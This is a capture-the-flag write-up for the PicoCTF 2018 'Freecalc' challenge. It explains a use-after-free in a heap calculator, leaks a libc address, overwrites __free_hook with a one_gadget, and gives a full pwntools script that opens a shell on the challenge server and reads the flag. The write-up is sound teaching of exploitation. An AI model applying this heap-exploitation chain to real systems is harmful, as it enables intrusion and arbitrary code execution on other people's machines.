PicoCTF 2018 - Freecalc

Note: This article is part of our PicoCTF 2018 BinExp Guide.

WARNING: This challenge is more difficult than previous challenges. I would recommend reading this write-up to understand some basic heap concepts, but if you run into problems, then continue on to the next challenge and circle back to this one later on.

Spot the Bug

This executable has more than one problem. It also appears (according to the forum) that the challenge was changed in some way after being released, and as a result the challenge become more difficult than originally intended. I will show you how I solved the problem, however there may be other solutions as well.

The first problem is that if you give it more than 2 lines of input, it will crash. This is because the buffer allocated to store the line of text is free()d, but not set back to a NULL value. This causes getline() to re-use the free buffer, and then the program calls free() again. Since this buffer is likely already at the top of one of the bins, this is quickly identified as a double-free and glibc forces a segfault. I was unable to exploit this particular vulnerability despite spending quite a bit of time on it.

The other problem takes considerably more thought to exploit. The executable gives us a way to define “functions” (conceptually, I’d argue they are a macro) using the following format: : name <num_args> <arg1> <arg2> <...> <argN>. Basically, any instance of name will be replaced with the arguments.

An interesting thing happens though, when you nest function definitions. Consider:

: outer 1 : inner 1 #

(Note: # is a symbol for no-op, it will have no effect).

What this does is define a function that defines another function. After executing that line, there will be a function named outer. However, inner itself won’t be defined until after outer is executed. Let’s look at part of the code for parsing the function definitions from the string:

funcdef_t *f = NULL;

f = xmalloc(sizeof(funcdef_t));
f->name = xmalloc((strlen(fname) + 1) * sizeof(char));
strcpy(f->name, fname);
f->ops = xmalloc(farg * sizeof(operation_t));
f->opcount = farg;

Here, we allocate a structure f, allocate a string and copy fname there, and allocate an array of ops large enough for farg ops. IE: parsing a function definition always does 3 allocations: 1 for the function definition itself (24 bytes), 1 for the name (strlen()+1 bytes), and 1 for the array of ops (n*16 bytes).

Now that we’ve parsed the definition, what happens after parsing to actually make it work?

void define_function(funcdef_t *f) {
    for (size_t i = 0; i < fid; i++) {
        if (!strcmp(functions[i]->name, f->name)) {
            // Function already exists.
            funcdef_t *oldf = functions[i];
            if (f->opcount > oldf->opcount) {
                // Resize ops array
                oldf->ops = xrealloc(oldf->ops, f->opcount * sizeof(operation_t));
                oldf->opcount = f->opcount;
            }
            // Copy new ops to old ops
            memcpy(oldf->ops, f->ops, f->opcount * sizeof(operation_t));

            free(f->ops);
            free(f->name);
            free(f);

            return;
        }
    }

    // Function has not been defined.
    if (fid >= FMAX) {
        puts("Too many functions defined.");
        exit(1);
    }
    
    functions[fid++] = f; 
}

Here we see the function definition does one of two things: either it has a unique name, in which case it is added to the list of functions, or the name is already in use and the new ops array is memcopied over the old one and the 3 definition allocations are freed.

Now, what happens in the nested case? Well, the ops-array for outer will itself contain an operation for defining the inner function. Now, what happens if inner already exists the first time outer is called? Well, since inner already exists, the new op-array for inner will be memcopied over-top of the existing definition for inner and the definition for the new inner will be freed. However, remember that the new definition for inner was still referenced in the op-array for outer. Now what happens if outer is called yet again? Well, now the op-array for outer points at freed memory. This is a use-after-free bug.

Strategy

We’ve identified a potential bug, but not much else. What does this use-after-free bug really allow us to do?

For all the remaining heap exploits in PicoCTF 2018, the first step will always be to learn the offset of gLibc in the memory space. Since dynamic libraries are always compiled as Position Independent Code, ASLR protections will kick in and load it into a random offset in memory. Once you know where libc is in memory, you can directly reference any gadgets it contains. Since libc is big, it contains many useful gadgets. It even contains gadgets that (given certain conditions are met), you can jump straight into with no addition setup, and that will directly launch into a shell for you. You can find these gadgets using the tool one_gadget.

Of course, even after you know where a one-gadget is in the program’s memory space, it can be non-trivial to cause program execution to continue there. Usually, this will require some sort of arbitrary memory write primitive (write-what-where). With one of those, you would typically target one of either __malloc_hook or __free_hook, which are function pointers that get called on every malloc or free call (respectively). Alternatively, you might also modify the .got.plt segment to swap out an existing function reference for a new address.

We’ve already seen that nesting function definitions will make the program vulnerable to a potential use-after-free vulnerability. The real trick here is constructing a useful memory write primitive. The first thing that came to mind for me was using the memcpy routine identified above, which copies a user-controlled ops-array into the address of an existing ops-array. The trick, obviously, is to point the function’s ops-array at an arbitrary address. Unfortunately, this was not as trivial as it first seemed.

Background Info

First things first, how do we figure out where libc is in memory? Well, the first thing you should know is that this version of libc has 2 different kinds of user-allocable memory: those serviced by fastbins, and those not serviced by fastbins. If you free memory below a certain size, it will automatically end up in a fast bin. Above that threshold, it all goes into an unsorted bin, and once it’s been sorted, may end up in a different set of bins (either small bins or large bins).

The main difference between a chunk of memory in a fastbin vs the other types (unsorted, small, large), is that fastbins re-use the chunk user-data to form a singly-linked list of free chunks (ending in NULL), while the other bins all use doubly-linked lists (fwd and bck). This means that a chunk in a fastbin only contains a pointer to the next free chunk, while a chunk in another bin will contain a pointer both to the next free trunk, as well as a previous chunk in the list. Eventually all the doubly-linked lists point back into the management structure inside of libc. This means that both the “first” and “last” chunks in a doubly linked list contain a direct pointer to an address inside of libc.

If a chunk that has been freed is the first, last, or only chunk in one of the doubly-linked bins, and there is a use-after-free bug allowing you to reference that free memory, you may be able to dump it’s content and reveal a pointer into libc’s address space. Learning the offset of libc is known as “leaking” libc.

The next thing that you should understand is that when you allocate memory that could be serviced by a fastbin, it will attempt to use any chunks inside of that fastbin first, in a Last-In-First-Out pattern. The other bins are all serviced in a First-In-First-Out pattern (which is easy with a doubly-linked list).

For this version of libc, on x86-64, chunks start at 32 bytes (with a mandatory 8 byte header, leaving 24 bytes available to the user) and are aligned to 16 byte boundaries (32, 48, 64, …). The actual threshold at which point chunks stop going into fastbins is runtime configurable (mxfast) and may actually be less than the number of available fastbins. However, the threshold will be somewhere around the 160-byte mark, typically a little less. There is a dedicated fastbin for each chunk size between the minimum (32 bytes) and the maximum.

NOTE: Both types of list (singly and doubly linked) use pointers to the start of the chunk header. A chunk header is actually 16 bytes, but the first 8 bytes overlap with the previous chunk and are only valid if the previous chunk is “free” (the remaining 8 bytes of the header is part of the allocation overhead discussed previously).

Let’s Recap:

Freeing “Small” allocations goes into a fastbin, and those allocations are re-used in a LIFO pattern.
Chunks in a fastbin contain a pointer to the next chunk in that fastbin.
Freeing “larger” allocations causes that chunk to end up in the unsorted bin.
The first and last chunk in the unsorted bin contains pointers into a libc management structure because the unsorted bin is a doubly-linked list.
All list pointers are to a 16-byte chunk header, which overlaps with the last 8 bytes of the chunk immediately before it in memory.

Exploitation

Let’s assume that the name and function definition structure are both less than or equal to 24 bytes, meaning the smallest possible chunk (32 bytes) is sufficient to represent both of them, and when those chunks are freed they end up in the same fastbin. Now consider the potential use-after-free we had previously discussed:

free(f->ops);
free(f->name);
free(f);

After freeing memory, the fastbin corresponding with the smallest chunk would look something like: f -> name, where the chunk for f will point to the chunk for name, and the chunk for f would be the re-used for the next allocation of 24 bytes or less.

When we write f -> name what do we mean? Well, the first 8 bytes of what was the user-data section of the chunk will be replaced with a pointer to the chunk header of the name chunk. If the name chunk was immediately after f in memory (which would happen for consecutive fresh allocations that did not re-use prior chunks), then the first 8 bytes of fs chunk would point at the chunk header for name, which overlaps with the last 8 bytes of f. Since f was a funcdef_t (and chunks in fastbins are considered in-use and never contain completely valid chunk-headers), the last 8 bytes of f are the same as the opcount, stored in little-endian format. Therefore, if f originally allocated 9 ops, then it’s opcount field would be “\x09\x00\x00\x00\x00\x00\x00\x00”. If our use-after-free still assumes this memory is a valid funcdef_t, then it would interpret this function definition of having a name of “\x09”. Why did we choose 9 ops? Well, it’s large enough that the op-array would end-up in the unsorted bin, and it so happens that the ASCII code for ‘\x09’ is the same as ‘\t’ (ie: a Tab), which is easy to type and will be passed directly through to the program without any additional interference.

If the structure’s ops pointer was untouched, and it still pointed to the user-data of the first (and only) chunk in the unsorted bin, then the first 16 bytes of that data would be replaced by fwd/bck pointers into a libc memory structure. What would happen if the code then tried to execute things that are supposed to be operation_ts, but are actually pointers into libc?

typedef struct operation {
    long t;
    opval_t v;
} operation_t;

// ...

switch (op->t) {
    // ...
    default:
        printf("Invalid operation '%ld'\n", op->t);
        break;
}

Well, the value of op->t would actually be a memory address in libc. The default case of the switch statement would execute, and op->t would be printed to the screen! This is exactly the libc leak we are looking for.

Let’s recap how to construct this leak:

There should be an existing function definition for inner
Define a new definition for outer, that itself defines inner with 9 ops (no-op is fine).
Execute outer, which will re-define inner, and then free the memory it used to represent inner.
Execute outer again, which will attempt to define a new function, however the structures will be corrupted because they have been freed. The name of this new function will now be “\t” (because the name ptr will point at the last 8 bytes of the function definition, which hold the previous opcount). The ops array of this new function will still point the previous ops-array for inner, which is now in the unsorted bin, and the first operation in that array will no longer be valid.
Execute “\t”, which will attempt to run the ops in the ops-array, which will error out because the operation isn’t valid, and will print the value of the invalid op to the screen.

In the interest of brevity, I will use the name “i” instead of inner, and “o” instead of outer.

Here is what that looks like:

$ ./calc
Welcome to heapcalc!
This is a postfix calculator. Commands: + * - / = # constant function
 Example: '1 1 + =' outputs 2.
Define functions like ': <name> <opcount> <op1> <op2> ...'
 Example: ': add 1 +' defines a function add with one operation which executes '+'.
Good luck!
>> : i 0 : o 1 : i 9 # # # # # # # # # o o
Running o
Running o
Running
Invalid operation '140737475726200'
>>

NOTE: The last character is not shown above. Immediately after “o o ”, but before you press Enter, you must type TAB).

The leaked value is 140737475726200, or 0x7FFFFF3F4B78 in hex. This represents the offset of the “chunk-header” for the unsorted bin inside of the main_arena data structure in libc. This address is a fixed offset from whatever address the base of libc is loaded into. You can recover the base address by subtracting 0x3c4b78 from the leaked value. In this case, libc is loaded into 0x00007fffff030000.

Next up: the Write-What-Where memory write primitive.

Exploitation (Part 2)

We’ve leaked libc, but now we are in a pickle. We know we only get 1 more line of input before the program crashes.

We want to use the memcpy that occurs when a function definition already exists. We also have control over a function definition that is already on the list, since the last function definition points to free memory. The question is: how do you get the ops-array of that definition to point at an arbitrary address?

There are other operations that we haven’t looked at yet, two of them being pushing and popping from the stack. You can push by using a number, and you can pop by using a “=”. Let’s see what the stack data structures look like:

typedef struct stack_el {
    long val;
    struct stack_el *next;
} stack_el_t;

typedef stack_el_t* stack_t;

Ok, so the stack structure forms a singly linked list, where the first 8 bytes are a value, and the second 8 bytes is a pointer to the next item in the stack. The stack structures are allocated on the heap, but are small enough to fit in the smallest chunk.

Does this help us? Well, if we push a number, say 1234 at this point, then the most recently freed chunk will be re-used, and it will now contain a stack_el_t, with 1234 as the first 8 bytes and a pointer to whatever stack_el_t was previously at the top of the stack as the next 8 bytes. For the sake of argument, we will pretend that we had previously pushed at least one value onto the stack.

Compare this with the function definition structure:

typedef struct funcdef {
    char *name;
    struct operation *ops;
    size_t opcount;
} funcdef_t;

In the function definition structure, the first 8 bytes are a pointer to a string, and the second 8 bytes are a pointer to an ops-array.

Remember, there is now a function in the functions[] array that points at FREE MEMORY, and that chunk is currently the top most chunk in the first fastbin. So, what happens if we now push a value on the stack? That same chunk will be re-used to create a stack_el_t, where the first 8 bytes will be the value we push, and the next 8 bytes will point to the existing top of the stack. At the same time, the program will think that memory is also a valid function definition. The name of that function will be the string at the location of whatever number we put in interpreted as a pointer. Its ops-array pointer will be the pointer to the previous item on the stack. The ops-length will remain uninitialized, and will be whatever was in that memory previously.

After pushing a value onto the stack, if we were to then define a function with the same name as the vulnerable function in the functions[] array, then we would overwrite one of the items on the stack, replacing it’s value and next pointer with an operation (a t and a v).

If we can overwrite the next pointer inside a stack element, then when we pop it off the stack, the pointer to the top of the stack will now be a value completely under our control. Pushing a new value onto the stack would copy the top of the stack pointer into the new element, and give us full control over those 16 bytes (both the value AND the next pointer). If that exact chunk happened to align with the same bit of memory that was pointed to by the vulnerable function definition in the functions[] array, then the name pointer and the ops pointer for that definition would be under our control. We could then define a function with the same name, and the program would memcpy the ops array it creates overtop of the destination pointer under our control. This is our write-what-where memory write primitive.

NOTE: You now have all the pieces you need to construct your own exploit. Try it out by connecting to 2018shell.picoctf.com, port 59874.

Exploitation (Part 3)

The last part is putting it all together. First up, we need to know the address of a string that exists in memory. Since PIE is not enabled on this binary, all of the addresses of string constants compiled into the binary are known:

$ objdump -s -j .rodata ./calc

calc:     file format elf64-x86-64

Contents of section .rodata:
 401480 01000200 00000000 6d616c6c 6f632066  ........malloc f
 401490 61696c65 642e0072 65616c6c 6f632066  ailed..realloc f
 4014a0 61696c65 642e0041 7474656d 70746564  ailed..Attempted
 4014b0 20746f20 706f7020 656d7074 79207374   to pop empty st
 4014c0 61636b2e 00546f6f 206d616e 79206675  ack..Too many fu
 4014d0 6e637469 6f6e7320 64656669 6e65642e  nctions defined.
 4014e0 00200049 6e76616c 69642066 756e6374  . .Invalid funct
 4014f0 696f6e20 6e616d65 2e00496e 76616c69  ion name..Invali
 401500 64206172 67756d65 6e742063 6f756e74  d argument count
 401510 2e00257a 75000000 4e6f7420 656e6f75  ..%zu...Not enou
 401520 67682066 756e6374 696f6e20 61726775  gh function argu
 401530 6d656e74 732e0025 6c64002b 002a002d  ments..%ld.+.*.-
 401540 002f003d 0023003a 00496e76 616c6964  ./.=.#.:.Invalid
 401550 206f7065 72617469 6f6e2027 2573270a   operation '%s'.
 401560 0052756e 6e696e67 2025730a 00256c64  .Running %s..%ld
 401570 0a00496e 76616c69 64206f70 65726174  ..Invalid operat
 401580 696f6e20 27256c64 270a0000 00000000  ion '%ld'.......
 401590 8d104000 00000000 12114000 00000000  ..@.......@.....
 4015a0 51114000 00000000 91114000 00000000  Q.@.......@.....
 4015b0 d0114000 00000000 63124000 00000000  ..@.....c.@.....
 4015c0 a9104000 00000000 36124000 00000000  ..@.....6.@.....
 4015d0 0e124000 00000000 57656c63 6f6d6520  ..@.....Welcome
 4015e0 746f2068 65617063 616c6321 00000000  to heapcalc!....
 4015f0 54686973 20697320 6120706f 73746669  This is a postfi
 401600 78206361 6c63756c 61746f72 2e20436f  x calculator. Co
 401610 6d6d616e 64733a20 2b202a20 2d202f20  mmands: + * - /
 401620 3d202320 636f6e73 74616e74 2066756e  = # constant fun
 401630 6374696f 6e000000 20457861 6d706c65  ction... Example
 401640 3a202731 2031202b 203d2720 6f757470  : '1 1 + =' outp
 401650 75747320 322e0000 44656669 6e652066  uts 2...Define f
 401660 756e6374 696f6e73 206c696b 6520273a  unctions like ':
 401670 203c6e61 6d653e20 3c6f7063 6f756e74   <name> <opcount
 401680 3e203c6f 70313e20 3c6f7032 3e202e2e  > <op1> <op2> ..
 401690 2e270000 00000000 20457861 6d706c65  .'...... Example
 4016a0 3a20273a 20616464 2031202b 27206465  : ': add 1 +' de
 4016b0 66696e65 73206120 66756e63 74696f6e  fines a function
 4016c0 20616464 20776974 68206f6e 65206f70   add with one op
 4016d0 65726174 696f6e20 77686963 68206578  eration which ex
 4016e0 65637574 65732027 2b272e00 476f6f64  ecutes '+'..Good
 4016f0 206c7563 6b21003e 3e2000              luck!.>> .

I (arbitrarily) selected the substring “!”, from the end of “Welcome to heapcalc!”. This string starts at 0x4015e0 + 11 (ie: 0x4015eb or 4199915 in decimal).

For this challenge, we also need to know the address of a one_gadget to call inside of libc:

$ one_gadget ./libc.so.6
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf0274 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1117 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

In this case, there are 4 gadgets listed. For this challenge, the second one, at an offset 0x4526a will work. Choosing one is a largely a matter of trial and error. If, for some reason, the conditions are not trivially met, you’ll have to change the callstack/environment around so that they can work.

How will we get the program to execute this gadget? Well, we’ll overwrite the location of the __free_hook symbol inside of libc, which will get called whenever our program calls free(). Note: because we are memcopying an op-array, and the numeric value in an operation is actually stored in the second 8 bytes, we will actually use a pointer to 8 bytes before __free_hook.

$ objdump -T ./libc.so.6 | grep '__free_hook'
00000000003c67a8  w   DO .bss   0000000000000008  GLIBC_2.2.5 __free_hook

IE: __free_hook is at offset 0x3c67a8, but we will use the address 0x3c67a0 so that operation_t.v is written to __free_hook.

Here is the complete list of steps:

Push 0 onto the stack (we need something so that we can overwrite it later)
Define the inner function
Define the outer function that will itself (re)define the inner function with 9 args
Call outer
Call outer
Call “\t”
Newline (causes above to execute and libc offset to leak)
Push 4199915
Define function “!” with 1 arg, a value of libc_baseaddr + 0x3c67a0 (&__free_hook - 8)
Pop
Pop (internal s* now points to the target destination in libc)
Define a new function to consume exactly 1 “small” chunk (name and ops array must both be larger than 24 bytes)
Push 4199915
Define function “!” with 1 arg, a value of libc_baseaddr + 0x4526a (our gadget)
Newline (Execute above, the one_gadget will be called due to call to a free() after the memcpy())

Or, the same steps, but using pwntools:

#!/bin/env python3

from pwn import *

context.update(arch='amd64', os='linux')

#p = process(["ltrace", "-o", "trace", "./calc"])
#p = gdb.debug("./calc", "break main\ncontinue\n\nbreak 284\nbreak 295\ncontinue\n")
#p = process("./calc")
p = remote('2018shell.picoctf.com', 59874)

p.recvuntil(">> ")
p.sendline("0 : i 0 : o 1 : i 9 # # # # # # # # # o o \t")

p.recvuntil("Invalid operation '")
libcaddr = int(p.recvuntil("'")[:-1]) - 0x3c4b78
print("Libc Addr: 0x%016x" % libcaddr)

gadgetaddr = (libcaddr + 0x4526a)
print("gadget addr: 0x%016x" % gadgetaddr)

freehookaddr = libcaddr + 0x3c67a0 #actually 8 bytes before __free_hook
print("free hook: 0x%016x" % freehookaddr)

p.recvuntil(">> ")

p.sendline("4199915 : ! 1 " + str(freehookaddr) + " = = : xxyyzzwwabcdefghijklmnop 2 # # 4199915 : ! 1 " + str(gadgetaddr))

p.interactive()

Let’s try it out, the challenge is available at 2018shell.picoctf.com, port 59874.

$ python3 pwn_calc2.py
[+] Opening connection to 2018shell.picoctf.com on port 59874: Done
Libc Addr: 0x00007f7809afe000
gadget addr: 0x00007f7809b4326a
free hook: 0x00007f7809ec47a0
[*] Switching to interactive mode
4199915
0
$ ls
calc
calc.c
flag
libc.so.6
xinet_startup.sh
$ cat flag
picoCTF{===REDACTED===}

Boom! If you managed to wrap your head around this one, the remaining challenges are by and large less difficult. Head back to the PicoCTF 2018 BinExp Guide to continue.